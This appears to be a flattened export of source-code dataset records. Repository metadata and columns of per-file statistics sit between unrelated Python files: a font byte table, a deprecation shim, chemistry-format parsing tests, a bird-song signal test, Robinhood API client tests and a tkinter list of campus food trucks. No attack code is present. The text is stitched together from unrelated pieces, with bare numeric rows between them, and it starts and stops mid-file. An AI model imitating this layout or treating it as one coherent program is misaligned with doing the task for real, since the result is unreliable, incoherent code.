[0x00, 0x00, 0x00, 0x00, 0x00], # 0xE7
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xE8
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xE9
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xEA
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xEB
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xEC
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xED
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xEE
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xEF
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xF0
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xF1
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xF2
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xF3
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xF4
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xF5
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xF6
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xF7
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xF8
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xF9
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xFA
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xFB
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xFC
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xFD
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xFE
[0x00, 0x00, 0x00, 0x00, 0x00], # 0xFF
]
| 70.399497
| 92
| 0.53875
| 11,888
| 112,076
| 5.07781
| 0.044583
| 1.103885
| 1.431591
| 1.622927
| 0.860731
| 0.742665
| 0.715547
| 0.704183
| 0.699313
| 0.653292
| 0
| 0.604966
| 0.318694
| 112,076
| 1,591
| 93
| 70.443746
| 0.185495
| 0.093651
| 0
| 0.839411
| 0
| 0
| 0.00006
| 0
| 0
| 0
| 0.537135
| 0
| 0
| 1
| 0.00064
| false
| 0
| 0.00064
| 0
| 0.001919
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
bf6fd8033e7d3d604ad9c4cbace77ff11bb55f66
| 239
|
py
|
Python
|
nmigen_boards/machxo3_sk.py
|
lethalbit/nmigen-boards
|
aaf18252e457ff95257137da2a629820c0ff2bfa
|
[
"BSD-2-Clause"
] | 11
|
2021-12-10T12:23:29.000Z
|
2022-03-13T08:40:20.000Z
|
nmigen_boards/machxo3_sk.py
|
lethalbit/nmigen-boards
|
aaf18252e457ff95257137da2a629820c0ff2bfa
|
[
"BSD-2-Clause"
] | 12
|
2021-12-11T18:51:29.000Z
|
2022-03-12T05:08:52.000Z
|
nmigen_boards/machxo3_sk.py
|
lethalbit/nmigen-boards
|
aaf18252e457ff95257137da2a629820c0ff2bfa
|
[
"BSD-2-Clause"
] | 7
|
2021-12-12T07:20:21.000Z
|
2022-03-06T06:20:55.000Z
|
from amaranth_boards.machxo3_sk import *
from amaranth_boards.machxo3_sk import __all__
import warnings
warnings.warn("instead of nmigen_boards.machxo3_sk, use amaranth_boards.machxo3_sk",
DeprecationWarning, stacklevel=2)
| 29.875
| 84
| 0.803347
| 31
| 239
| 5.806452
| 0.516129
| 0.288889
| 0.333333
| 0.383333
| 0.366667
| 0.366667
| 0
| 0
| 0
| 0
| 0
| 0.024272
| 0.138075
| 239
| 7
| 85
| 34.142857
| 0.849515
| 0
| 0
| 0
| 0
| 0
| 0.280335
| 0.213389
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bfa387b74f7560b0102d0516a1ef9aca5eede727
| 1,790
|
py
|
Python
|
tests/test_kv_parsing_array_type_promotion.py
|
libAtoms/extxyz
|
f48a3c68a50eebaef035b8c615120dbccaaa38c6
|
[
"MIT"
] | 3
|
2021-06-18T15:07:57.000Z
|
2022-01-26T22:02:01.000Z
|
tests/test_kv_parsing_array_type_promotion.py
|
libAtoms/extxyz
|
f48a3c68a50eebaef035b8c615120dbccaaa38c6
|
[
"MIT"
] | 7
|
2021-07-26T13:12:25.000Z
|
2022-01-26T22:35:17.000Z
|
tests/test_kv_parsing_array_type_promotion.py
|
libAtoms/extxyz
|
f48a3c68a50eebaef035b8c615120dbccaaa38c6
|
[
"MIT"
] | 1
|
2021-06-24T09:17:33.000Z
|
2021-06-24T09:17:33.000Z
|
def test_array_one_d_type_promotion(tmp_path, helpers):
# int + float to float
v_str = [ '1', '2', '3.0', '+4.0e0' ]
v = [1.0, 2.0, 3.0, 4.0]
helpers.do_one_d_variants(tmp_path, False, 4, v, v_str)
# int + barestring to string
v_str = [ '1', '2', 'abc', 'd']
v = ['1', '2', 'abc', 'd']
helpers.do_one_d_variants(tmp_path, True, 4, v, v_str)
# bool + barestring to string
v_str = [ 'T', 'False', 'abc', 'd']
v = ['T', 'False', 'abc', 'd']
helpers.do_one_d_variants(tmp_path, True, 4, v, v_str)
# bool + quotedstring to string
v_str = [ 'T', 'False', '"abc"', 'd']
v = ['T', 'False', 'abc', 'd']
helpers.do_one_d_variants(tmp_path, True, 4, v, v_str)
# bool + int to string
v_str = [ 'T', 'False', '12', '345' ]
v = ['T', 'False', '12', '345']
helpers.do_one_d_variants(tmp_path, True, 4, v, v_str)
def test_array_two_d_type_promotion(tmp_path, helpers):
# int + float to float
v_str = [ '1', '2', '3.0', '+4.0e0' ]
v = [1.0, 2.0, 3.0, 4.0]
helpers.do_two_d_variants(tmp_path, 2, 2, v, v_str)
# # int + barestring to string
# v_str = [ '1', '2', 'abc', 'd']
# v = ['1', '2', 'abc', 'd']
# helpers.do_two_d_variants(tmp_path, 2, 2, v, v_str)
# # bool + barestring to string
# v_str = [ 'T', 'False', 'abc', 'd']
# v = ['T', 'False', 'abc', 'd']
# helpers.do_two_d_variants(tmp_path, 2, 2, v, v_str)
# # bool + quotedstring to string
# v_str = [ 'T', 'False', '"abc"', 'd']
# v = ['T', 'False', 'abc', 'd']
# helpers.do_two_d_variants(tmp_path, 2, 2, v, v_str)
# # bool + int to string
# v_str = [ 'T', 'False', '12', '345' ]
# v = ['T', 'False', '12', '345']
# helpers.do_two_d_variants(tmp_path, 2, 2, v, v_str)
| 33.773585
| 60
| 0.529609
| 302
| 1,790
| 2.900662
| 0.112583
| 0.091324
| 0.136986
| 0.182648
| 0.958904
| 0.958904
| 0.958904
| 0.937215
| 0.937215
| 0.937215
| 0
| 0.054315
| 0.249162
| 1,790
| 52
| 61
| 34.423077
| 0.59747
| 0.409497
| 0
| 0.5
| 0
| 0
| 0.095238
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0
| 0
| 0.1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bfb222438deef7e074c102ba9ad97fd5be5c73ca
| 209
|
py
|
Python
|
classifier/naive_bayes/__init__.py
|
ecohealthalliance/eha_grit
|
cb95b759222ca7a416dd7d439571e7b610dd5e23
|
[
"Apache-2.0"
] | null | null | null |
classifier/naive_bayes/__init__.py
|
ecohealthalliance/eha_grit
|
cb95b759222ca7a416dd7d439571e7b610dd5e23
|
[
"Apache-2.0"
] | null | null | null |
classifier/naive_bayes/__init__.py
|
ecohealthalliance/eha_grit
|
cb95b759222ca7a416dd7d439571e7b610dd5e23
|
[
"Apache-2.0"
] | null | null | null |
from classifier import sklearn_classifier
from sklearn.naive_bayes import MultinomialNB as NaiveBayes
def classify(train, test):
nb = NaiveBayes()
return sklearn_classifier.classify(train, test, nb)
| 26.125
| 59
| 0.794258
| 26
| 209
| 6.269231
| 0.576923
| 0.208589
| 0.208589
| 0.233129
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.143541
| 209
| 7
| 60
| 29.857143
| 0.910615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.4
| 0
| 0.8
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
44a1c31de028627df585f65f80737db9218bee08
| 2,568
|
py
|
Python
|
BirdSongToolbox/test/test_preprocessing/test_hilbert_modules.py
|
Darilbii/BirdSongToolbox
|
f4853a7f6cb5c4ef0f57e9f346be08f6e153ca65
|
[
"Apache-2.0"
] | 3
|
2021-08-03T00:03:37.000Z
|
2021-09-25T04:37:52.000Z
|
BirdSongToolbox/test/test_preprocessing/test_hilbert_modules.py
|
Darilbii/BirdSongToolbox
|
f4853a7f6cb5c4ef0f57e9f346be08f6e153ca65
|
[
"Apache-2.0"
] | 1
|
2021-08-08T11:04:36.000Z
|
2021-08-08T11:04:36.000Z
|
BirdSongToolbox/test/test_preprocessing/test_hilbert_modules.py
|
Darilbii/BirdSongToolbox
|
f4853a7f6cb5c4ef0f57e9f346be08f6e153ca65
|
[
"Apache-2.0"
] | null | null | null |
from BirdSongToolbox.ImportClass import Import_PrePd_Data
from BirdSongToolbox.PreProcessClass import BPF_Master, BPF_Module, hilbert_module
import numpy as np
import pytest
bird_id = 'z020'
date = 'day-2016-06-02'
@pytest.mark.run(order=1)
def test_hilbert_module_phase(PrePd_data_dir_path):
PreP_Data = Import_PrePd_Data(bird_id, date, location=PrePd_data_dir_path)
Channels = PreP_Data.Song_Neural
Freq_Bands = ([10], [1])
SN_L = PreP_Data.Sn_Len
Gp_L = PreP_Data.Gap_Len
Num_Chan = PreP_Data.Num_Chan
order_num = 175
fs = PreP_Data.Fs
FiltFilt = True
Num_Trials = PreP_Data.Num_Motifs
song_length, number_channels = np.shape(Channels[0])
tops, bottoms = Freq_Bands
num_freq = len(tops)
assert number_channels == Num_Chan
Frequencies = BPF_Master(Channels, Num_Trials=Num_Trials, Freq_Bands=Freq_Bands, SN_L=SN_L, Gp_L=Gp_L,
Num_Chan=Num_Chan, Num_Freq=len(tops), order_num=order_num, fs=fs, FiltFilt=FiltFilt,
verbose=False)
hilbert_results = hilbert_module(Frequencies, output='phase')
# Smoke Tests: hilbert_results
assert isinstance(hilbert_results, list)
assert isinstance(hilbert_results[0], list)
assert isinstance(hilbert_results[0][0], np.ndarray)
assert np.shape(hilbert_results) == (Num_Trials, number_channels, song_length, num_freq)
def test_hilbert_module_amplitude(PrePd_data_dir_path):
PreP_Data = Import_PrePd_Data(bird_id, date, location=PrePd_data_dir_path)
Channels = PreP_Data.Song_Neural
Freq_Bands = ([10], [1])
SN_L = PreP_Data.Sn_Len
Gp_L = PreP_Data.Gap_Len
Num_Chan = PreP_Data.Num_Chan
order_num = 175
fs = PreP_Data.Fs
FiltFilt = True
Num_Trials = PreP_Data.Num_Motifs
song_length, number_channels = np.shape(Channels[0])
tops, bottoms = Freq_Bands
num_freq = len(tops)
assert number_channels == Num_Chan
Frequencies = BPF_Master(Channels, Num_Trials=Num_Trials, Freq_Bands=Freq_Bands, SN_L=SN_L, Gp_L=Gp_L,
Num_Chan=Num_Chan, Num_Freq=len(tops), order_num=order_num, fs=fs, FiltFilt=FiltFilt,
verbose=False)
hilbert_results = hilbert_module(Frequencies, output='amplitude')
# Smoke Tests: hilbert_results
assert isinstance(hilbert_results, list)
assert isinstance(hilbert_results[0], list)
assert isinstance(hilbert_results[0][0], np.ndarray)
assert np.shape(hilbert_results) == (Num_Trials, number_channels, song_length, num_freq)
| 34.24
| 114
| 0.716121
| 368
| 2,568
| 4.649457
| 0.192935
| 0.065459
| 0.080655
| 0.105202
| 0.847458
| 0.847458
| 0.847458
| 0.847458
| 0.847458
| 0.847458
| 0
| 0.015474
| 0.194704
| 2,568
| 74
| 115
| 34.702703
| 0.811896
| 0.022196
| 0
| 0.792453
| 0
| 0
| 0.012764
| 0
| 0
| 0
| 0
| 0
| 0.188679
| 1
| 0.037736
| false
| 0
| 0.113208
| 0
| 0.150943
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
78055f0f394b07a9be00dbf1b24952cd307a498f
| 55
|
py
|
Python
|
cell2location/models/base/__init__.py
|
bio-ruxandra-tesloianu/cell2location
|
7d9a187b88cf67d6d134b452749f325826d67a57
|
[
"Apache-2.0"
] | null | null | null |
cell2location/models/base/__init__.py
|
bio-ruxandra-tesloianu/cell2location
|
7d9a187b88cf67d6d134b452749f325826d67a57
|
[
"Apache-2.0"
] | null | null | null |
cell2location/models/base/__init__.py
|
bio-ruxandra-tesloianu/cell2location
|
7d9a187b88cf67d6d134b452749f325826d67a57
|
[
"Apache-2.0"
] | null | null | null |
from . import pymc3_model
from . import pymc3_loc_model
| 27.5
| 29
| 0.836364
| 9
| 55
| 4.777778
| 0.555556
| 0.465116
| 0.697674
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.041667
| 0.127273
| 55
| 2
| 29
| 27.5
| 0.854167
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
780a8c086dc252a1e623a936680b2cb8c8ed4c41
| 10,869
|
py
|
Python
|
tests/test_stocks.py
|
omikader/aiorobinhood
|
132487133186058049d893a849660508dd0fa09e
|
[
"MIT"
] | 9
|
2020-08-05T23:40:16.000Z
|
2021-08-18T10:30:15.000Z
|
tests/test_stocks.py
|
omikader/aiorobinhood
|
132487133186058049d893a849660508dd0fa09e
|
[
"MIT"
] | 3
|
2020-08-26T15:36:31.000Z
|
2020-08-26T17:02:33.000Z
|
tests/test_stocks.py
|
omikader/aiorobinhood
|
132487133186058049d893a849660508dd0fa09e
|
[
"MIT"
] | 1
|
2020-08-15T00:26:07.000Z
|
2020-08-15T00:26:07.000Z
|
import asyncio
import json
import pytest
from aiorobinhood import HistoricalInterval, HistoricalSpan
from aiorobinhood.urls import (
FUNDAMENTALS,
HISTORICALS,
INSTRUMENTS,
QUOTES,
RATINGS,
TAGS,
)
@pytest.mark.asyncio
async def test_get_fundamentals_by_symbols(logged_in_client):
client, server = logged_in_client
task = asyncio.create_task(client.get_fundamentals(symbols=["ABCD"]))
request = await server.receive_request(timeout=pytest.TIMEOUT)
assert request.method == "GET"
assert request.headers["Authorization"] == f"Bearer {pytest.ACCESS_TOKEN}"
assert request.path == FUNDAMENTALS.path
assert request.query["symbols"] == "ABCD"
server.send_response(
request,
content_type="application/json",
text=json.dumps({"results": [{}]}),
)
result = await asyncio.wait_for(task, pytest.TIMEOUT)
assert result == [{}]
@pytest.mark.asyncio
async def test_get_fundamentals_by_instruments(logged_in_client):
client, server = logged_in_client
task = asyncio.create_task(client.get_fundamentals(instruments=["<>"]))
request = await server.receive_request(timeout=pytest.TIMEOUT)
assert request.method == "GET"
assert request.headers["Authorization"] == f"Bearer {pytest.ACCESS_TOKEN}"
assert request.path == FUNDAMENTALS.path
assert request.query["instruments"] == "<>"
server.send_response(
request,
content_type="application/json",
text=json.dumps({"results": [{}]}),
)
result = await asyncio.wait_for(task, pytest.TIMEOUT)
assert result == [{}]
@pytest.mark.asyncio
async def test_get_fundamentals_value_error(logged_in_client):
client, _ = logged_in_client
with pytest.raises(ValueError):
await client.get_fundamentals()
with pytest.raises(ValueError):
await client.get_fundamentals(symbols=["ABCD"], instruments=["<>"])
@pytest.mark.asyncio
async def test_get_instruments_by_symbol(logged_in_client):
client, server = logged_in_client
task = asyncio.create_task(client.get_instruments(symbol="ABCD"))
request = await server.receive_request(timeout=pytest.TIMEOUT)
assert request.method == "GET"
assert request.headers["Authorization"] == f"Bearer {pytest.ACCESS_TOKEN}"
assert request.path == INSTRUMENTS.path
assert request.query["symbol"] == "ABCD"
server.send_response(
request,
content_type="application/json",
text=json.dumps({"next": str(pytest.NEXT), "results": [{"foo": "bar"}]}),
)
request = await server.receive_request(timeout=pytest.TIMEOUT)
assert request.method == "GET"
assert request.headers["Authorization"] == f"Bearer {pytest.ACCESS_TOKEN}"
assert request.path == pytest.NEXT.path
server.send_response(
request,
content_type="application/json",
text=json.dumps({"next": None, "results": [{"baz": "quux"}]}),
)
result = await asyncio.wait_for(task, pytest.TIMEOUT)
assert result == [{"foo": "bar"}, {"baz": "quux"}]
@pytest.mark.asyncio
async def test_get_instruments_by_ids(logged_in_client):
client, server = logged_in_client
task = asyncio.create_task(client.get_instruments(ids=["12345"]))
request = await server.receive_request(timeout=pytest.TIMEOUT)
assert request.method == "GET"
assert request.headers["Authorization"] == f"Bearer {pytest.ACCESS_TOKEN}"
assert request.path == INSTRUMENTS.path
assert request.query["ids"] == "12345"
server.send_response(
request,
content_type="application/json",
text=json.dumps({"next": str(pytest.NEXT), "results": [{"foo": "bar"}]}),
)
request = await server.receive_request(timeout=pytest.TIMEOUT)
assert request.method == "GET"
assert request.headers["Authorization"] == f"Bearer {pytest.ACCESS_TOKEN}"
assert request.path == pytest.NEXT.path
server.send_response(
request,
content_type="application/json",
text=json.dumps({"next": None, "results": [{"baz": "quux"}]}),
)
result = await asyncio.wait_for(task, pytest.TIMEOUT)
assert result == [{"foo": "bar"}, {"baz": "quux"}]
@pytest.mark.asyncio
async def test_get_instruments_value_error(logged_in_client):
client, _ = logged_in_client
with pytest.raises(ValueError):
await client.get_instruments()
with pytest.raises(ValueError):
await client.get_instruments(symbol="ABCD", ids=["12345"])
@pytest.mark.asyncio
async def test_get_quotes_by_symbols(logged_in_client):
client, server = logged_in_client
task = asyncio.create_task(client.get_quotes(symbols=["ABCD"]))
request = await server.receive_request(timeout=pytest.TIMEOUT)
assert request.method == "GET"
assert request.headers["Authorization"] == f"Bearer {pytest.ACCESS_TOKEN}"
assert request.path == QUOTES.path
assert request.query["symbols"] == "ABCD"
server.send_response(
request,
content_type="application/json",
text=json.dumps({"results": [{}]}),
)
result = await asyncio.wait_for(task, pytest.TIMEOUT)
assert result == [{}]
@pytest.mark.asyncio
async def test_get_quotes_by_instruments(logged_in_client):
client, server = logged_in_client
task = asyncio.create_task(client.get_quotes(instruments=["<>"]))
request = await server.receive_request(timeout=pytest.TIMEOUT)
assert request.method == "GET"
assert request.headers["Authorization"] == f"Bearer {pytest.ACCESS_TOKEN}"
assert request.path == QUOTES.path
assert request.query["instruments"] == "<>"
server.send_response(
request,
content_type="application/json",
text=json.dumps({"results": [{}]}),
)
result = await asyncio.wait_for(task, pytest.TIMEOUT)
assert result == [{}]
@pytest.mark.asyncio
async def test_get_quotes_value_error(logged_in_client):
client, _ = logged_in_client
with pytest.raises(ValueError):
await client.get_quotes()
with pytest.raises(ValueError):
await client.get_quotes(symbols=["ABCD"], instruments=["<>"])
@pytest.mark.asyncio
async def test_get_historical_quotes_by_symbols(logged_in_client):
client, server = logged_in_client
task = asyncio.create_task(
client.get_historical_quotes(
interval=HistoricalInterval.FIVE_MIN,
span=HistoricalSpan.DAY,
symbols=["ABCD"],
)
)
request = await server.receive_request(timeout=pytest.TIMEOUT)
assert request.method == "GET"
assert request.headers["Authorization"] == f"Bearer {pytest.ACCESS_TOKEN}"
assert request.path == HISTORICALS.path
assert request.query["bounds"] == "regular"
assert request.query["interval"] == HistoricalInterval.FIVE_MIN.value
assert request.query["span"] == HistoricalSpan.DAY.value
assert request.query["symbols"] == "ABCD"
server.send_response(
request,
content_type="application/json",
text=json.dumps({"results": [{}]}),
)
result = await asyncio.wait_for(task, pytest.TIMEOUT)
assert result == [{}]
@pytest.mark.asyncio
async def test_get_historical_quotes_by_instruments(logged_in_client):
client, server = logged_in_client
task = asyncio.create_task(
client.get_historical_quotes(
interval=HistoricalInterval.FIVE_MIN,
span=HistoricalSpan.DAY,
instruments=["<>"],
)
)
request = await server.receive_request(timeout=pytest.TIMEOUT)
assert request.method == "GET"
assert request.headers["Authorization"] == f"Bearer {pytest.ACCESS_TOKEN}"
assert request.path == HISTORICALS.path
assert request.query["bounds"] == "regular"
assert request.query["interval"] == HistoricalInterval.FIVE_MIN.value
assert request.query["span"] == HistoricalSpan.DAY.value
assert request.query["instruments"] == "<>"
server.send_response(
request,
content_type="application/json",
text=json.dumps({"results": [{}]}),
)
result = await asyncio.wait_for(task, pytest.TIMEOUT)
assert result == [{}]
@pytest.mark.asyncio
async def test_get_historical_quotes_value_error(logged_in_client):
client, _ = logged_in_client
with pytest.raises(ValueError):
await client.get_historical_quotes()
with pytest.raises(ValueError):
await client.get_historical_quotes(symbols=["ABCD"], instruments=["<>"])
@pytest.mark.asyncio
async def test_get_ratings(logged_in_client):
client, server = logged_in_client
task = asyncio.create_task(client.get_ratings(ids=["12345", "67890"]))
request = await server.receive_request(timeout=pytest.TIMEOUT)
assert request.method == "GET"
assert request.headers["Authorization"] == f"Bearer {pytest.ACCESS_TOKEN}"
assert request.path == RATINGS.path
assert request.query["ids"] == "12345,67890"
server.send_response(
request,
content_type="application/json",
text=json.dumps({"next": str(pytest.NEXT), "results": [{"foo": "bar"}]}),
)
request = await server.receive_request(timeout=pytest.TIMEOUT)
assert request.method == "GET"
assert request.headers["Authorization"] == f"Bearer {pytest.ACCESS_TOKEN}"
assert request.path == pytest.NEXT.path
server.send_response(
request,
content_type="application/json",
text=json.dumps({"next": None, "results": [{"baz": "quux"}]}),
)
result = await asyncio.wait_for(task, pytest.TIMEOUT)
assert result == [{"foo": "bar"}, {"baz": "quux"}]
@pytest.mark.asyncio
async def test_get_tags(logged_in_client):
client, server = logged_in_client
task = asyncio.create_task(client.get_tags(id_="12345"))
request = await server.receive_request(timeout=pytest.TIMEOUT)
assert request.method == "GET"
assert request.headers["Authorization"] == f"Bearer {pytest.ACCESS_TOKEN}"
assert request.path == (TAGS / "instrument" / "12345/").path
server.send_response(
request,
content_type="application/json",
text=json.dumps({"tags": [{"slug": "foo"}]}),
)
result = await asyncio.wait_for(task, pytest.TIMEOUT)
assert result == ["foo"]
@pytest.mark.asyncio
async def test_get_tag_members(logged_in_client):
client, server = logged_in_client
task = asyncio.create_task(client.get_tag_members(tag="foo"))
request = await server.receive_request(timeout=pytest.TIMEOUT)
assert request.method == "GET"
assert request.headers["Authorization"] == f"Bearer {pytest.ACCESS_TOKEN}"
assert request.path == (TAGS / "tag" / "foo/").path
server.send_response(
request,
content_type="application/json",
text=json.dumps({"instruments": ["<>"]}),
)
result = await asyncio.wait_for(task, pytest.TIMEOUT)
assert result == ["<>"]
| 34.287066
| 81
| 0.683228
| 1,255
| 10,869
| 5.734661
| 0.066135
| 0.10296
| 0.058358
| 0.045852
| 0.956927
| 0.954703
| 0.949423
| 0.944977
| 0.921078
| 0.899264
| 0
| 0.005048
| 0.179777
| 10,869
| 316
| 82
| 34.39557
| 0.802243
| 0
| 0
| 0.714286
| 0
| 0
| 0.119974
| 0.027049
| 0
| 0
| 0
| 0
| 0.262548
| 1
| 0
| false
| 0
| 0.019305
| 0
| 0.019305
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1521271b947ecd6f345d1af01ccc654845f410b3
| 130
|
py
|
Python
|
2020/alaska2-image-steganalysis/datasets/__init__.py
|
kn25ha01/kaggle-competitions
|
fce44d6758c4757a7d0a0a6b00d756ff26a97d3f
|
[
"MIT"
] | null | null | null |
2020/alaska2-image-steganalysis/datasets/__init__.py
|
kn25ha01/kaggle-competitions
|
fce44d6758c4757a7d0a0a6b00d756ff26a97d3f
|
[
"MIT"
] | null | null | null |
2020/alaska2-image-steganalysis/datasets/__init__.py
|
kn25ha01/kaggle-competitions
|
fce44d6758c4757a7d0a0a6b00d756ff26a97d3f
|
[
"MIT"
] | null | null | null |
from .dataset_factory import get_dataloader, get_dataset
from .dataset_factory import get_train_valid_data, get_local_test_data
| 26
| 70
| 0.876923
| 20
| 130
| 5.2
| 0.55
| 0.211538
| 0.346154
| 0.461538
| 0.519231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.092308
| 130
| 4
| 71
| 32.5
| 0.881356
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
153b1ef327a7d2dc00d3bb112386e7804f533da7
| 8,006
|
py
|
Python
|
temple UI.py
|
cchoiyon/FinalProject2021
|
7dd08b4caedeec2785368b461e93e48b3a9bc5db
|
[
"MIT"
] | null | null | null |
temple UI.py
|
cchoiyon/FinalProject2021
|
7dd08b4caedeec2785368b461e93e48b3a9bc5db
|
[
"MIT"
] | null | null | null |
temple UI.py
|
cchoiyon/FinalProject2021
|
7dd08b4caedeec2785368b461e93e48b3a9bc5db
|
[
"MIT"
] | null | null | null |
#temple Eats UI
import tkinter
from tkinter import *
class Veg_Table:
def __init__(self,root):
#code for creating table
for r in range(total_rows):
for c in range(total_columns):
self.e = Entry(root, width=65, fg='purple',font=('Arial',7,'bold'))
self.e.grid(row=r, column=c,)
self.e.insert(END, Veg_lst[r][c])
#take the data
Veg_lst = [('VEG RESTAURANTS','ACCEPTED PAYMENT TYPES'),
('Dev Food Truck','debit/credit/cash'),
('Tommy Lunch Truck','debit/credit/cash'),
('Little Lulu','debit/credit/cash'),
('Tasty Eats','debit/credit/cash'),
('4 Brothers','debit/credit/cash'),
('New York Gyro','debit/credit/cash'),
('Mountain Pizza','debit/credit/cash'),
('Philly Halal Gyro','debit/credit/cash'),
('Mexican Grill Stand','debit/credit/cash'),
('Halal Gyro Express','debit/credit/cash'),
('Famous NY Gyro','debit/credit/cash'),
('Caribbean Feast','debit/credit/cash'),
('Sunny Halal Food','debit/credit/cash'),
('Eddies','debit/credit/cash'),
('Sexy Green Truck','debit/credit/cash'),
('Cha Cha','debit/credit/cash'),
('Eppys Truck','debit/credit/cash'),
('Ernies','debit/credit/cash'),
('The Fruit Salad & smoothie truck','debit/credit/cash'),
('E&E Gourmet Express','debit/credit/cash'),
('Chicken Heaven','debit/credit/cash'),
('Chop Chop','debit/credit/cash'),
('Fruit Salad','debit/credit/cash'),
('Kobawoo Express','debit/credit/cash'),
('Jamaican Ds','debit/credit/cash'),
('Philly Fellas Gyro Halal','debit/credit/cash'),
('Brother Pizza','debit/credit/cash'),
('Temple Teppanyaki','debit/credit/cash'),
('Foot Long','debit/credit/cash'),
('Honey','debit/credit/cash'),
('Richie Lunch Box','debit/credit/cash'),
('Cloud','debit/credit/cash'),
('Samosa Deb','debit/credit/cash'),
('Top Bap','debit/credit/cash'),
('Ray Truck','debit/credit/cash'),
('The Creperie Truck','debit/credit/cash'),
('Burger Tank','debit/credit/cash'),
('El Guaco Loco','debit/credit/cash'),
('Korea House','debit/credit/cash'),
('Vegan Tree','debit/credit/cash'),
('Subway','debit/credit/cash | diamond dollars'),
('Zen','meal equivalency | debit/credit/cash | diamond dollars'),
('Esposito Dining Center','meal plan | meal equivalency | debit/credit/cash | diamond dollars'),
('Twisted Taco','meal equivalency | debit/credit/cash | diamond dollars'),
('Morgan Dining Hall','meal plan | meal equivalency | debit/credit/cash | diamond dollars'),
('BurgerFi','meal equivalency | debit/credit/cash | diamond dollars'),
('Saladworks','meal equivalency | debit/credit/cash | diamond dollars'),
('Starbucks','debit/credit/cash | diamond dollars'),
('Pita and Co.','meal equivalency | debit/credit/cash | diamond dollars'),
('Panda Express','meal equivalency | debit/credit/cash | diamond dollars'),
('Jamba','debit/credit/cash'),
('Java City','debit/credit/cash'),
('Stella Café','debit/credit/cash')]
#find total number of rows and
#columns in list
total_rows = len(Veg_lst)
total_columns = len(Veg_lst[0])
# create root window
root = Tk()
t = Veg_Table(root)
root.mainloop()
class NonVeg_Table:
def __init__(self,root):
#code for creating table
for r in range(total_rows):
for c in range(total_columns):
